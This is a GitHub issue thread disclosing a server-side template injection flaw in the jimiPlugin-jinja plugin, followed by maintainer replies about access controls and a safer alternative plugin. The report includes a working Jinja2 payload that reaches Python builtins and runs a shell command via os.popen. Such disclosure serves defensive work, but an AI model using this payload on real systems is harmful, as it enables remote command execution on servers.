### ISSUE TITLE
Security: Plugin Vulnerable to SSTI

### ISSUE THREAD

**Issue by b1scuit-thi3f** [z1pti3/jimiPlugin-jinja#1]
Server Side Template Injection is possible within this plugin:
![image](https://user-images.githubusercontent.com/14958920/113475692-17697500-946f-11eb-865e-61462eb8a459.png)

A PoC was created using the following input:
{% for x in ().__class__.__base__.__subclasses__() %}{% if "warning" in x.__name__ %}{{x()._module.__builtins__['__import__']('os').popen("whoami").read()}}{%endif%}{%endfor%}

For more info:
https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Template%20Injection#jinja2

**Comment by ghost** [comment]
This is an expected result of using jinja? To my knowledge there is no method to prevent this. Jimi offers a granular ACL which can be used to lock templates as readonly and/or prevent certain user groups from using the plugin altogether.

v3.0 will support docker containers for executing flows which will significantly reduce the impact of exploitation to short lived containers. Jimi by nature permits low-code programming which is difficult to prevent RCE type attacks, the modular nature of the plugin system however allows you to pick which plugins can be used by who.

I wonder if this issue does however need to be flagged to users so that they can make a choice about which level of users are permitted use?

**Comment by ghost** [comment]
For a safer but less powerful templating plugin check out https://github.com/z1pti3/jimiPlugin-chevron
